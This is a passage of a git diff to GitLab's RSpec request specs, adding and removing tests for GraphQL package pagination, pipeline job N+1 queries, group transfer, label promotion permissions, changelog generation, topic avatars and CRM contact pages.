it 'raises expected error' do post_graphql_mutation(mutation, current_user: user) diff --git a/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb b/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb index 716983f01d2..28a46583d2a 100644 --- a/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb +++ b/spec/requests/api/graphql/mutations/user_callouts/create_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'Create a user callout' do let_it_be(:current_user) { create(:user) } - let(:feature_name) { ::UserCallout.feature_names.each_key.first } + let(:feature_name) { ::Users::Callout.feature_names.each_key.first } let(:input) do { diff --git a/spec/requests/api/graphql/packages/package_spec.rb b/spec/requests/api/graphql/packages/package_spec.rb index 83ea9ff4dc8..a9019a7611a 100644 --- a/spec/requests/api/graphql/packages/package_spec.rb +++ b/spec/requests/api/graphql/packages/package_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe 'package details' do include GraphqlHelpers - let_it_be(:project) { create(:project) } + let_it_be_with_reload(:project) { create(:project) } let_it_be(:composer_package) { create(:composer_package, project: project) } let_it_be(:composer_json) { { name: 'name', type: 'type', license: 'license', version: 1 } } let_it_be(:composer_metadatum) do @@ -68,7 +68,7 @@ RSpec.describe 'package details' do subject expect(graphql_data_at(:package, :versions, :nodes, :version)).to be_present - expect(graphql_data_at(:package, :versions, :nodes, :versions, :nodes)).to be_empty + expect(graphql_data_at(:package, :versions, :nodes, :versions, :nodes)).to eq [nil, nil] end end end @@ -96,4 +96,87 @@ RSpec.describe 'package details' do expect(graphql_data_at(:b)).to be(nil) end end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + before do + project.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + it 'returns no packages' do + subject + + 
expect(graphql_data_at(:package)).to be_nil + end + end + + context 'pipelines field', :aggregate_failures do + let(:pipelines) { create_list(:ci_pipeline, 6, project: project) } + let(:pipeline_gids) { pipelines.sort_by(&:id).map(&:to_gid).map(&:to_s).reverse } + + before do + composer_package.pipelines = pipelines + composer_package.save! + end + + def run_query(args) + pipelines_nodes = <<~QUERY + nodes { + id + } + pageInfo { + startCursor + endCursor + } + QUERY + + query = graphql_query_for(:package, { id: package_global_id }, query_graphql_field("pipelines", args, pipelines_nodes)) + post_graphql(query, current_user: user) + end + + it 'loads the second page with pagination first correctly' do + run_query(first: 2) + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[0..1]) + + cursor = graphql_data.dig('package', 'pipelines', 'pageInfo', 'endCursor') + + run_query(first: 2, after: cursor) + + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[2..3]) + end + + it 'loads the second page with pagination last correctly' do + run_query(last: 2) + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[4..5]) + + cursor = graphql_data.dig('package', 'pipelines', 'pageInfo', 'startCursor') + + run_query(last: 2, before: cursor) + + pipeline_ids = graphql_data.dig('package', 'pipelines', 'nodes').pluck('id') + + expect(pipeline_ids).to eq(pipeline_gids[2..3]) + end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + before do + project.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + it 'returns no packages' do + run_query(first: 2) + + expect(graphql_data_at(:package)).to be_nil + end + end + end end diff --git a/spec/requests/api/graphql/project/cluster_agents_spec.rb 
b/spec/requests/api/graphql/project/cluster_agents_spec.rb index dc7254dd552..585126f3849 100644 --- a/spec/requests/api/graphql/project/cluster_agents_spec.rb +++ b/spec/requests/api/graphql/project/cluster_agents_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'Project.cluster_agents' do let_it_be(:project) { create(:project, :public) } let_it_be(:current_user) { create(:user, maintainer_projects: [project]) } - let_it_be(:agents) { create_list(:cluster_agent, 5, project: project) } + let_it_be(:agents) { create_list(:cluster_agent, 3, project: project) } let(:first) { var('Int') } let(:cluster_agents_fields) { nil } @@ -105,4 +105,37 @@ RSpec.describe 'Project.cluster_agents' do }) end end + + context 'selecting activity events' do + let_it_be(:token) { create(:cluster_agent_token, agent: agents.first) } + let_it_be(:event) { create(:agent_activity_event, agent: agents.first, agent_token: token, user: current_user) } + + let(:cluster_agents_fields) { [:id, query_nodes(:activity_events, of: 'ClusterAgentActivityEvent', max_depth: 2)] } + + it 'retrieves activity event details' do + post_graphql(query, current_user: current_user) + + response = graphql_data_at(:project, :cluster_agents, :nodes, :activity_events, :nodes).first + + expect(response).to include({ + 'kind' => event.kind, + 'level' => event.level, + 'recordedAt' => event.recorded_at.iso8601, + 'agentToken' => hash_including('name' => token.name), + 'user' => hash_including('name' => current_user.name) + }) + end + + it 'preloads associations to prevent N+1 queries' do + user = create(:user) + token = create(:cluster_agent_token, agent: agents.second) + create(:agent_activity_event, agent: agents.second, agent_token: token, user: user) + + post_graphql(query, current_user: current_user) + + expect do + post_graphql(query, current_user: current_user) + end.to issue_same_number_of_queries_as { post_graphql(query, current_user: current_user, variables: [first.with(1)]) } + end + end end diff --git 
a/spec/requests/api/graphql/project/jobs_spec.rb b/spec/requests/api/graphql/project/jobs_spec.rb new file mode 100644 index 00000000000..1a823ede9ac --- /dev/null +++ b/spec/requests/api/graphql/project/jobs_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe 'Query.project.jobs' do + include GraphqlHelpers + + let_it_be(:project) { create(:project, :repository, :public) } + let_it_be(:user) { create(:user) } + + let(:pipeline) do + create(:ci_pipeline, project: project, user: user) + end + + let(:query) do + <<~QUERY + { + project(fullPath: "#{project.full_path}") { + jobs { + nodes { + name + previousStageJobsAndNeeds { + nodes { + name + } + } + } + } + } + } + QUERY + end + + it 'does not generate N+1 queries', :request_store, :use_sql_query_cache do + build_stage = create(:ci_stage_entity, position: 1, name: 'build', project: project, pipeline: pipeline) + test_stage = create(:ci_stage_entity, position: 2, name: 'test', project: project, pipeline: pipeline) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 1 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 2 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 1 2', stage: test_stage) + test_job = create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 2 2', stage: test_stage) + create(:ci_build_need, build: test_job, name: 'docker 1 2') + + post_graphql(query, current_user: user) + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + post_graphql(query, current_user: user) + end + + create(:ci_build, name: 'test-a', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + test_b_job = create(:ci_build, name: 'test-b', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + create(:ci_build_need, build: test_b_job, name: 'docker 2 2') + + 
expect do + post_graphql(query, current_user: user) + end.not_to exceed_all_query_limit(control) + end +end diff --git a/spec/requests/api/graphql/project/pipeline_spec.rb b/spec/requests/api/graphql/project/pipeline_spec.rb index d46ef313563..73e02e2a4b1 100644 --- a/spec/requests/api/graphql/project/pipeline_spec.rb +++ b/spec/requests/api/graphql/project/pipeline_spec.rb @@ -273,6 +273,48 @@ RSpec.describe 'getting pipeline information nested in a project' do end end + context 'N+1 queries on pipeline jobs' do + let(:pipeline) { create(:ci_pipeline, project: project) } + + let(:fields) do + <<~FIELDS + jobs { + nodes { + previousStageJobsAndNeeds { + nodes { + name + } + } + } + } + FIELDS + end + + it 'does not generate N+1 queries', :request_store, :use_sql_query_cache do + build_stage = create(:ci_stage_entity, position: 1, name: 'build', project: project, pipeline: pipeline) + test_stage = create(:ci_stage_entity, position: 2, name: 'test', project: project, pipeline: pipeline) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 1 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: build_stage.position, name: 'docker 2 2', stage: build_stage) + create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 1 2', stage: test_stage) + test_job = create(:ci_build, pipeline: pipeline, stage_idx: test_stage.position, name: 'rspec 2 2', stage: test_stage) + create(:ci_build_need, build: test_job, name: 'docker 1 2') + + post_graphql(query, current_user: current_user) + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + post_graphql(query, current_user: current_user) + end + + create(:ci_build, name: 'test-a', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + test_b_job = create(:ci_build, name: 'test-b', stage: test_stage, stage_idx: test_stage.position, pipeline: pipeline) + create(:ci_build_need, build: test_b_job, name: 'docker 2 2') + + expect 
do + post_graphql(query, current_user: current_user) + end.not_to exceed_all_query_limit(control) + end + end + context 'N+1 queries on stages jobs' do let(:depth) { 5 } let(:fields) do diff --git a/spec/requests/api/graphql/project_query_spec.rb b/spec/requests/api/graphql/project_query_spec.rb index e44a7efb354..310a8e9fa33 100644 --- a/spec/requests/api/graphql/project_query_spec.rb +++ b/spec/requests/api/graphql/project_query_spec.rb @@ -143,6 +143,40 @@ RSpec.describe 'getting project information' do end end + context 'when the user has guest access' do + context 'when the project has public pipelines' do + before do + pipeline = create(:ci_pipeline, project: project) + create(:ci_build, project: project, pipeline: pipeline, name: 'a test job') + project.add_guest(current_user) + end + + it 'shows all jobs' do + query = <<~GQL + query { + project(fullPath: "#{project.full_path}") { + jobs { + nodes { + name + stage { + name + } + } + } + } + } + GQL + + post_graphql(query, current_user: current_user) + + expect(graphql_data_at(:project, :jobs, :nodes)).to contain_exactly({ + 'name' => 'a test job', + 'stage' => { 'name' => 'test' } + }) + end + end + end + context 'when the user does not have access to the project' do it 'returns an empty field' do post_graphql(query, current_user: current_user) diff --git a/spec/requests/api/groups_spec.rb b/spec/requests/api/groups_spec.rb index 75f5a974d22..d226bb07c73 100644 --- a/spec/requests/api/groups_spec.rb +++ b/spec/requests/api/groups_spec.rb @@ -174,18 +174,6 @@ RSpec.describe API::Groups do 'Remaining records can be retrieved using keyset pagination.' 
) end - - context 'when the feature flag `keyset_pagination_for_groups_api` is disabled' do - before do - stub_feature_flags(keyset_pagination_for_groups_api: false) - end - - it 'returns successful response' do - get api('/groups'), params: { page: 3000, per_page: 25 } - - expect(response).to have_gitlab_http_status(:ok) - end - end end context 'on making requests below the allowed offset pagination threshold' do @@ -247,24 +235,6 @@ RSpec.describe API::Groups do expect(records.size).to eq(1) expect(records.first['id']).to eq(group_2.id) end - - context 'when the feature flag `keyset_pagination_for_groups_api` is disabled' do - before do - stub_feature_flags(keyset_pagination_for_groups_api: false) - end - - it 'ignores the keyset pagination params and performs offset pagination' do - get api('/groups'), params: { pagination: 'keyset', per_page: 1 } - - expect(response).to have_gitlab_http_status(:ok) - records = json_response - expect(records.size).to eq(1) - expect(records.first['id']).to eq(group_1.id) - - params_for_next_page = params_for_next_page(response) - expect(params_for_next_page).not_to include('cursor') - end - end end context 'on making requests with unsupported ordering structure' do @@ -1973,6 +1943,116 @@ RSpec.describe API::Groups do end end + describe 'POST /groups/:id/transfer' do + let_it_be(:user) { create(:user) } + let_it_be_with_reload(:new_parent_group) { create(:group, :private) } + let_it_be_with_reload(:group) { create(:group, :nested, :private) } + + before do + new_parent_group.add_owner(user) + group.add_owner(user) + end + + def make_request(user) + post api("/groups/#{group.id}/transfer", user), params: params + end + + context 'when promoting a subgroup to a root group' do + shared_examples_for 'promotes the subgroup to a root group' do + it 'returns success' do + make_request(user) + + expect(response).to have_gitlab_http_status(:created) + expect(json_response['parent_id']).to be_nil + end + end + + context 'when no group_id 
is specified' do + let(:params) {} + + it_behaves_like 'promotes the subgroup to a root group' + end + + context 'when group_id is specified as blank' do + let(:params) { { group_id: '' } } + + it_behaves_like 'promotes the subgroup to a root group' + end + + context 'when the group is already a root group' do + let(:group) { create(:group) } + let(:params) { { group_id: '' } } + + it 'returns error' do + make_request(user) + + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to eq('Transfer failed: Group is already a root group.') + end + end + end + + context 'when transferring a subgroup to a different group' do + let(:params) { { group_id: new_parent_group.id } } + + context 'when the user does not have admin rights to the group being transferred' do + it 'forbids the operation' do + developer_user = create(:user) + group.add_developer(developer_user) + + make_request(developer_user) + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'when the user does not have access to the new parent group' do + it 'fails with 404' do + user_without_access_to_new_parent_group = create(:user) + group.add_owner(user_without_access_to_new_parent_group) + + make_request(user_without_access_to_new_parent_group) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when the ID of a non-existent group is mentioned as the new parent group' do + let(:params) { { group_id: non_existing_record_id } } + + it 'fails with 404' do + make_request(user) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when the transfer fails due to an error' do + before do + expect_next_instance_of(::Groups::TransferService) do |service| + expect(service).to receive(:proceed_to_transfer).and_raise(Gitlab::UpdatePathError, 'namespace directory cannot be moved') + end + end + + it 'returns error' do + make_request(user) + + expect(response).to 
have_gitlab_http_status(:bad_request) + expect(json_response['message']).to eq('Transfer failed: namespace directory cannot be moved') + end + end + + context 'when the transfer succceds' do + it 'returns success' do + make_request(user) + + expect(response).to have_gitlab_http_status(:created) + expect(json_response['parent_id']).to eq(new_parent_group.id) + end + end + end + end + it_behaves_like 'custom attributes endpoints', 'groups' do let(:attributable) { group1 } let(:other_attributable) { group2 } diff --git a/spec/requests/api/import_github_spec.rb b/spec/requests/api/import_github_spec.rb index d5fed330401..f0c4fcc4f29 100644 --- a/spec/requests/api/import_github_spec.rb +++ b/spec/requests/api/import_github_spec.rb @@ -11,12 +11,12 @@ RSpec.describe API::ImportGithub do let(:user) { create(:user) } let(:project) { create(:project) } let(:provider_username) { user.username } - let(:provider_user) { OpenStruct.new(login: provider_username) } + let(:provider_user) { double('provider', login: provider_username) } let(:provider_repo) do - OpenStruct.new( + double('provider', name: 'vim', full_name: "#{provider_username}/vim", - owner: OpenStruct.new(login: provider_username) + owner: double('provider', login: provider_username) ) end diff --git a/spec/requests/api/invitations_spec.rb b/spec/requests/api/invitations_spec.rb index cba4256adc5..702e6ef0a2a 100644 --- a/spec/requests/api/invitations_spec.rb +++ b/spec/requests/api/invitations_spec.rb @@ -152,25 +152,7 @@ RSpec.describe API::Invitations do end end - context 'with areas_of_focus', :snowplow do - it 'tracks the areas_of_focus from params' do - post invitations_url(source, maintainer), - params: { email: email, access_level: Member::DEVELOPER, areas_of_focus: 'Other' } - - expect_snowplow_event( - category: 'Members::InviteService', - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - context 'with tasks_to_be_done and tasks_project_id in the params' 
do - before do - stub_experiments(invite_members_for_task: true) - end - let(:project_id) { source_type == 'project' ? source.id : create(:project, namespace: source).id } context 'when there is 1 invitation' do diff --git a/spec/requests/api/issues/get_project_issues_spec.rb b/spec/requests/api/issues/get_project_issues_spec.rb index 07fa1d40f7b..9948e13e9ae 100644 --- a/spec/requests/api/issues/get_project_issues_spec.rb +++ b/spec/requests/api/issues/get_project_issues_spec.rb @@ -873,7 +873,7 @@ RSpec.describe API::Issues do end it 'returns 404 if the issue is confidential' do - post api("/projects/#{project.id}/issues/#{confidential_issue.iid}/participants", non_member) + get api("/projects/#{project.id}/issues/#{confidential_issue.iid}/participants", non_member) expect(response).to have_gitlab_http_status(:not_found) end diff --git a/spec/requests/api/labels_spec.rb b/spec/requests/api/labels_spec.rb index 4b6868f42bc..db9d72245b3 100644 --- a/spec/requests/api/labels_spec.rb +++ b/spec/requests/api/labels_spec.rb @@ -589,6 +589,15 @@ RSpec.describe API::Labels do expect(response).to have_gitlab_http_status(:forbidden) end + it 'returns 403 if reporter promotes label' do + reporter = create(:user) + project.add_reporter(reporter) + + put api("/projects/#{project.id}/labels/promote", reporter), params: { name: label1.name } + + expect(response).to have_gitlab_http_status(:forbidden) + end + it 'returns 404 if label does not exist' do put api("/projects/#{project.id}/labels/promote", user), params: { name: 'unknown' } @@ -601,6 +610,13 @@ RSpec.describe API::Labels do expect(response).to have_gitlab_http_status(:bad_request) expect(json_response['error']).to eq('name is missing') end + + it 'returns 400 if project does not have a group' do + project = create(:project, creator_id: user.id, namespace: user.namespace) + put api("/projects/#{project.id}/labels/promote", user), params: { name: label1.name } + + expect(response).to 
have_gitlab_http_status(:bad_request) + end end describe "POST /projects/:id/labels/:label_id/subscribe" do diff --git a/spec/requests/api/markdown_golden_master_spec.rb b/spec/requests/api/markdown_golden_master_spec.rb new file mode 100644 index 00000000000..4fa946de342 --- /dev/null +++ b/spec/requests/api/markdown_golden_master_spec.rb @@ -0,0 +1,9 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# See spec/fixtures/markdown/markdown_golden_master_examples.yml for documentation on how this spec works. +RSpec.describe API::Markdown, 'Golden Master' do + markdown_yml_file_path = File.expand_path('../../fixtures/markdown/markdown_golden_master_examples.yml', __dir__) + include_context 'API::Markdown Golden Master shared context', markdown_yml_file_path +end diff --git a/spec/requests/api/members_spec.rb b/spec/requests/api/members_spec.rb index 7f4345faabb..02061bb8ab6 100644 --- a/spec/requests/api/members_spec.rb +++ b/spec/requests/api/members_spec.rb @@ -387,38 +387,7 @@ RSpec.describe API::Members do end end - context 'with areas_of_focus considerations', :snowplow do - let(:user_id) { stranger.id } - - context 'when areas_of_focus is present in params' do - it 'tracks the areas_of_focus' do - post api("/#{source_type.pluralize}/#{source.id}/members", maintainer), - params: { user_id: user_id, access_level: Member::DEVELOPER, areas_of_focus: 'Other' } - - expect_snowplow_event( - category: 'Members::CreateService', - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - - context 'when areas_of_focus is not present in params' do - it 'does not track the areas_of_focus' do - post api("/#{source_type.pluralize}/#{source.id}/members", maintainer), - params: { user_id: user_id, access_level: Member::DEVELOPER } - - expect_no_snowplow_event(category: 'Members::CreateService', action: 'area_of_focus') - end - end - end - context 'with tasks_to_be_done and tasks_project_id in the params' do - before do - 
stub_experiments(invite_members_for_task: true) - end - let(:project_id) { source_type == 'project' ? source.id : create(:project, namespace: source).id } context 'when there is 1 user to add' do diff --git a/spec/requests/api/project_import_spec.rb b/spec/requests/api/project_import_spec.rb index 097d374640c..3ed08afd57d 100644 --- a/spec/requests/api/project_import_spec.rb +++ b/spec/requests/api/project_import_spec.rb @@ -47,7 +47,7 @@ RSpec.describe API::ProjectImport do it 'executes a limited number of queries' do control_count = ActiveRecord::QueryRecorder.new { subject }.count - expect(control_count).to be <= 101 + expect(control_count).to be <= 104 end it 'schedules an import using a namespace' do diff --git a/spec/requests/api/projects_spec.rb b/spec/requests/api/projects_spec.rb index cc546cbcda1..79dbbd20d83 100644 --- a/spec/requests/api/projects_spec.rb +++ b/spec/requests/api/projects_spec.rb @@ -1160,6 +1160,15 @@ RSpec.describe API::Projects do expect(response).to have_gitlab_http_status(:forbidden) end + it 'allows creating a project without an import_url when git import source is disabled', :aggregate_failures do + stub_application_setting(import_sources: nil) + project_params = { path: 'path-project-Foo' } + + expect { post api('/projects', user), params: project_params }.to change { Project.count }.by(1) + + expect(response).to have_gitlab_http_status(:created) + end + it 'disallows creating a project with an import_url that is not reachable', :aggregate_failures do url = 'http://example.com' endpoint_url = "#{url}/info/refs?service=git-upload-pack" @@ -1504,6 +1513,20 @@ RSpec.describe API::Projects do expect(json_response.map { |project| project['id'] }).to contain_exactly(private_project1.id) end + context 'and using an admin to search', :enable_admin_mode, :aggregate_errors do + it 'returns users projects when authenticated as admin' do + private_project1 = create(:project, :private, name: 'private_project1', creator_id: user4.id, namespace: 
user4.namespace) + + # min_access_level does not make any difference when admins search for a user's projects + get api("/users/#{user4.id}/projects/", admin), params: { min_access_level: 30 } + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to include_pagination_headers + expect(json_response).to be_an Array + expect(json_response.map { |project| project['id'] }).to contain_exactly(project4.id, private_project1.id, public_project.id) + end + end + context 'and using the programming language filter' do include_context 'with language detection' diff --git a/spec/requests/api/repositories_spec.rb b/spec/requests/api/repositories_spec.rb index f3146480be2..21a8622e08d 100644 --- a/spec/requests/api/repositories_spec.rb +++ b/spec/requests/api/repositories_spec.rb @@ -731,6 +731,71 @@ RSpec.describe API::Repositories do end end + describe 'GET /projects/:id/repository/changelog' do + it 'generates the changelog for a version' do + spy = instance_spy(Repositories::ChangelogService) + release_notes = 'Release notes' + + allow(Repositories::ChangelogService) + .to receive(:new) + .with( + project, + user, + version: '1.0.0', + from: 'foo', + to: 'bar', + date: DateTime.new(2020, 1, 1), + trailer: 'Foo' + ) + .and_return(spy) + + expect(spy).to receive(:execute).with(commit_to_changelog: false).and_return(release_notes) + + get( + api("/projects/#{project.id}/repository/changelog", user), + params: { + version: '1.0.0', + from: 'foo', + to: 'bar', + date: '2020-01-01', + trailer: 'Foo' + } + ) + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['notes']).to eq(release_notes) + end + + it 'supports leaving out the from and to attribute' do + spy = instance_spy(Repositories::ChangelogService) + + allow(Repositories::ChangelogService) + .to receive(:new) + .with( + project, + user, + version: '1.0.0', + date: DateTime.new(2020, 1, 1), + trailer: 'Foo' + ) + .and_return(spy) + + expect(spy).to 
receive(:execute).with(commit_to_changelog: false) + + get( + api("/projects/#{project.id}/repository/changelog", user), + params: { + version: '1.0.0', + date: '2020-01-01', + trailer: 'Foo' + } + ) + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['notes']).to be_present + end + end + describe 'POST /projects/:id/repository/changelog' do it 'generates the changelog for a version' do spy = instance_spy(Repositories::ChangelogService) @@ -751,7 +816,7 @@ RSpec.describe API::Repositories do ) .and_return(spy) - allow(spy).to receive(:execute) + allow(spy).to receive(:execute).with(commit_to_changelog: true) post( api("/projects/#{project.id}/repository/changelog", user), @@ -787,7 +852,7 @@ RSpec.describe API::Repositories do ) .and_return(spy) - expect(spy).to receive(:execute) + expect(spy).to receive(:execute).with(commit_to_changelog: true) post( api("/projects/#{project.id}/repository/changelog", user), diff --git a/spec/requests/api/search_spec.rb b/spec/requests/api/search_spec.rb index 8012892a571..b75fe11b06d 100644 --- a/spec/requests/api/search_spec.rb +++ b/spec/requests/api/search_spec.rb @@ -122,6 +122,23 @@ RSpec.describe API::Search do end end + context 'when DB timeouts occur from global searches', :aggregate_errors do + %w( + issues + merge_requests + milestones + projects + snippet_titles + users + ).each do |scope| + it "returns a 408 error if search with scope: #{scope} times out" do + allow(SearchService).to receive(:new).and_raise ActiveRecord::QueryCanceled + get api(endpoint, user), params: { scope: scope, search: 'awesome' } + expect(response).to have_gitlab_http_status(:request_timeout) + end + end + end + context 'when scope is not supported' do it 'returns 400 error' do get api(endpoint, user), params: { scope: 'unsupported', search: 'awesome' } diff --git a/spec/requests/api/settings_spec.rb b/spec/requests/api/settings_spec.rb index 641c6a2cd91..7e940d52a41 100644 --- a/spec/requests/api/settings_spec.rb +++ 
b/spec/requests/api/settings_spec.rb @@ -523,15 +523,6 @@ RSpec.describe API::Settings, 'Settings', :do_not_mock_admin_mode_setting do end end - context "missing spam_check_api_key value when spam_check_endpoint_enabled is true" do - it "returns a blank parameter error message" do - put api("/application/settings", admin), params: { spam_check_endpoint_enabled: true, spam_check_endpoint_url: "https://example.com/spam_check" } - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['error']).to eq('spam_check_api_key is missing') - end - end - context "overly long spam_check_api_key" do it "fails to update the settings with too long spam_check_api_key" do put api("/application/settings", admin), params: { spam_check_api_key: "0123456789" * 500 } diff --git a/spec/requests/api/terraform/state_spec.rb b/spec/requests/api/terraform/state_spec.rb index 5d2635126e8..24f38b04348 100644 --- a/spec/requests/api/terraform/state_spec.rb +++ b/spec/requests/api/terraform/state_spec.rb @@ -152,6 +152,16 @@ RSpec.describe API::Terraform::State do expect(response).to have_gitlab_http_status(:ok) expect(Gitlab::Json.parse(response.body)).to be_empty end + + context 'when serial already exists' do + let(:params) { { 'instance': 'example-instance', 'serial': state.latest_version.version } } + + it 'returns unprocessable entity' do + request + + expect(response).to have_gitlab_http_status(:unprocessable_entity) + end + end end context 'without body' do diff --git a/spec/requests/api/todos_spec.rb b/spec/requests/api/todos_spec.rb index c6b4f50afae..0944bfb6ba6 100644 --- a/spec/requests/api/todos_spec.rb +++ b/spec/requests/api/todos_spec.rb @@ -380,7 +380,7 @@ RSpec.describe API::Todos do end end - describe 'POST :id/issuable_type/:issueable_id/todo' do + describe 'POST :id/issuable_type/:issuable_id/todo' do context 'for an issue' do let_it_be(:issuable) do create(:issue, :confidential, project: project_1) diff --git a/spec/requests/api/topics_spec.rb 
b/spec/requests/api/topics_spec.rb index a5746a4022e..70eee8a1af9 100644 --- a/spec/requests/api/topics_spec.rb +++ b/spec/requests/api/topics_spec.rb @@ -5,15 +5,15 @@ require 'spec_helper' RSpec.describe API::Topics do include WorkhorseHelpers - let_it_be(:topic_1) { create(:topic, name: 'Git', total_projects_count: 1) } + let_it_be(:file) { fixture_file_upload('spec/fixtures/dk.png') } + + let_it_be(:topic_1) { create(:topic, name: 'Git', total_projects_count: 1, avatar: file) } let_it_be(:topic_2) { create(:topic, name: 'GitLab', total_projects_count: 2) } let_it_be(:topic_3) { create(:topic, name: 'other-topic', total_projects_count: 3) } let_it_be(:admin) { create(:user, :admin) } let_it_be(:user) { create(:user) } - let(:file) { fixture_file_upload('spec/fixtures/dk.png') } - describe 'GET /topics', :aggregate_failures do it 'returns topics ordered by total_projects_count' do get api('/topics') @@ -184,6 +184,14 @@ RSpec.describe API::Topics do expect(json_response['avatar_url']).to end_with('dk.png') end + it 'keeps avatar when updating other fields' do + put api("/topics/#{topic_1.id}", admin), params: { name: 'my-topic' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['name']).to eq('my-topic') + expect(topic_1.reload.avatar_url).not_to be_nil + end + it 'returns 404 for non existing id' do put api("/topics/#{non_existing_record_id}", admin), params: { name: 'my-topic' } @@ -196,6 +204,32 @@ RSpec.describe API::Topics do expect(response).to have_gitlab_http_status(:bad_request) expect(json_response['error']).to eql('id is invalid') end + + context 'with blank avatar' do + it 'removes avatar' do + put api("/topics/#{topic_1.id}", admin), params: { avatar: '' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['avatar_url']).to be_nil + expect(topic_3.reload.avatar_url).to be_nil + end + + it 'removes avatar besides other changes' do + put api("/topics/#{topic_1.id}", admin), params: { name: 
'new-topic-name', avatar: '' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['name']).to eq('new-topic-name') + expect(json_response['avatar_url']).to be_nil + expect(topic_1.reload.avatar_url).to be_nil + end + + it 'does not remove avatar in case of other errors' do + put api("/topics/#{topic_1.id}", admin), params: { name: topic_2.name, avatar: '' } + + expect(response).to have_gitlab_http_status(:bad_request) + expect(topic_1.reload.avatar_url).not_to be_nil + end + end end context 'as normal user' do diff --git a/spec/requests/api/v3/github_spec.rb b/spec/requests/api/v3/github_spec.rb index 6d8ae226ce4..838948132dd 100644 --- a/spec/requests/api/v3/github_spec.rb +++ b/spec/requests/api/v3/github_spec.rb @@ -567,18 +567,6 @@ RSpec.describe API::V3::Github do expect(response_diff_files(response)).to be_blank end - it 'does not handle the error when feature flag is disabled', :aggregate_failures do - stub_feature_flags(api_v3_commits_skip_diff_files: false) - - allow(Gitlab::GitalyClient).to receive(:call) - .with(*commit_diff_args) - .and_raise(GRPC::DeadlineExceeded) - - call_api - - expect(response).to have_gitlab_http_status(:error) - end - it 'only calls Gitaly once for all attempts within a period of time', :aggregate_failures do expect(Gitlab::GitalyClient).to receive(:call) .with(*commit_diff_args) diff --git a/spec/requests/groups/crm/contacts_controller_spec.rb b/spec/requests/groups/crm/contacts_controller_spec.rb new file mode 100644 index 00000000000..a4b2a28e77a --- /dev/null +++ b/spec/requests/groups/crm/contacts_controller_spec.rb @@ -0,0 +1,101 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Groups::Crm::ContactsController do + let_it_be(:user) { create(:user) } + + shared_examples 'response with 404 status' do + it 'returns 404' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + shared_examples 'ok response with index template' do + it 'renders 
the index template' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:index) + end + end + + shared_examples 'ok response with index template if authorized' do + context 'private group' do + let(:group) { create(:group, :private) } + + context 'with authorized user' do + before do + group.add_reporter(user) + sign_in(user) + end + + context 'when feature flag is enabled' do + it_behaves_like 'ok response with index template' + end + + context 'when feature flag is not enabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it_behaves_like 'response with 404 status' + end + end + + context 'with unauthorized user' do + before do + sign_in(user) + end + + it_behaves_like 'response with 404 status' + end + + context 'with anonymous user' do + it 'blah' do + subject + + expect(response).to have_gitlab_http_status(:found) + expect(response).to redirect_to(new_user_session_path) + end + end + end + + context 'public group' do + let(:group) { create(:group, :public) } + + context 'with anonymous user' do + it_behaves_like 'ok response with index template' + end + end + end + + describe 'GET #index' do + subject do + get group_crm_contacts_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #new' do + subject do + get new_group_crm_contact_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #edit' do + subject do + get edit_group_crm_contact_path(group, id: 1) + response + end + + it_behaves_like 'ok response with index template if authorized' + end +end diff --git a/spec/requests/groups/crm/organizations_controller_spec.rb b/spec/requests/groups/crm/organizations_controller_spec.rb new file mode 100644 index 00000000000..7595950350d --- /dev/null +++ b/spec/requests/groups/crm/organizations_controller_spec.rb @@ -0,0 +1,91 @@ +# frozen_string_literal: true 
